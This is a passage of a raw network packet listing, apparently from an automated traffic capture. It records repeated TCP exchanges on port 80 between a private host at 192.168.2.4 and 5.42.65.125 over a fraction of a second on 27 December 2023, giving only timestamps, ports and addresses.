Dec 27, 2023 17:57:25.577680111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.577694893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.577721119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.578466892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.578480959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.578515053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.578521013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.578536034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.578564882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.579255104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.579272032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.579317093 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.579333067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.579346895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.579382896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.580115080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.580158949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.580177069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.580192089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.580205917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.580233097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.580956936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.580971003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.580984116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.580997944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.581006050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.581022024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.581795931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.581818104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.581832886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.581847906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.581850052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.581871986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.582623959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.582638979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.582669973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.583055973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.583069086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.583100080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.583112001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.583115101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.583146095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.583874941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.583889961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.583918095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.583978891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.583992958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.584033012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.584707975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.584729910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.584743023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.584774971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.584779024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.584803104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.585582018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.585597038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.585633039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.585639000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.585654020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.585683107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.586313009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.586349010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.586355925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.586364985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.586436987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.586494923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.587146997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.587198019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.587212086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.587224007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.587244987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.587290049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.588040113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588054895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588085890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588098049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588109970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.588121891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.588762999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588778973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588807106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588814974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.588821888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.588845015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.589668989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.589685917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.589732885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.589746952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.589761019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.589801073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.590378046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.590421915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.590431929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.590436935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.590457916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.590503931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.591248989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.591264963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.591278076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.591291904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.591314077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.591335058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.591985941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.592020988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.592029095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.592036009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.592050076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.592087030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.592823982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.592838049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.592875957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.593189001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.593225002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.593236923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.593262911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.593277931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.593319893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.594027996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594042063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594053984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594067097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594074965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.594089031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.594860077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594877958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594894886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594909906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.594933033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.594947100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.595622063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.595664978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.595706940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.595721006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.595721006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.595758915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.596360922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.596405983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.596419096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.596421957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.596435070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.596462965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.597239017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.597253084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.597265005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.597279072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.597307920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.597337961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.597985029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598026991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598042011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598050117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.598057985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598088026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.598720074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598762989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598772049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.598777056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598825932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.598870039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.599525928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.599540949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.599585056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.599603891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.599617004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.599631071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.599643946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.599675894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.600579023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.600593090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.600605011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.600620985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.600635052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.600636959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.600676060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.601480961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.601495981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.601510048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.601524115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.601538897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.601543903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.601562023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.601584911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.602494001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.602509022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.602521896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.602557898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.603009939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.603024960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.603065014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.603082895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.603099108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.603111982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.603135109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.603148937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.603980064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.603995085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.604047060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.604053020 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.604062080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.604087114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.604098082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.605006933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.605021000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.605034113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.605048895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.605058908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.605062962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.605093956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.605107069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.605989933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.606004000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.606018066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.606046915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.606056929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.606071949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.606098890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.606965065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.606981039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607006073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607021093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607028961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.607034922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607065916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.607078075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.607845068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607889891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607903004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607917070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607929945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.607959986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.607995033 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.608773947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.608831882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.608845949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.608859062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.608871937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.608880997 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.608895063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.608918905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.609709024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.609796047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.609811068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.609843969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.609879017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.609894037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.609925032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.610616922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.610660076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.610739946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.610754967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.610766888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.610780001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.610802889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.610833883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.611584902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.611666918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.611681938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.611692905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.611706972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.611716986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.611751080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.612613916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.612648964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.612663031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.612667084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.612685919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.612709045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.612711906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.612747908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.613554955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.613569975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.613583088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.613610983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.613642931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.613673925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.613720894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.614515066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.614528894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.614571095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.614610910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.614655018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.614795923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.614809990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.614845991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.615439892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.615456104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.615469933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.615483046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.615495920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.615498066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.615528107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.616485119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.616498947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.616511106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.616523981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.616537094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.616569042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.616601944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.617261887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.617275953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.617311954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.617324114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.617326975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.617341995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.617373943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.618223906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.618238926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.618251085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.618263960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.618277073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.618294001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.618318081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.619479895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.619530916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.619545937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.619559050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.619573116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.619581938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.619601011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.620057106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.620073080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.620104074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.620117903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.620131016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.620132923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.620156050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.620177031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.620913982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621005058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621021032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621032953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621040106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621056080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.621090889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.621865988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621901989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621910095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621921062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.621952057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.621963024 CET	80	49738	5.42.65.125	192.168.2.4
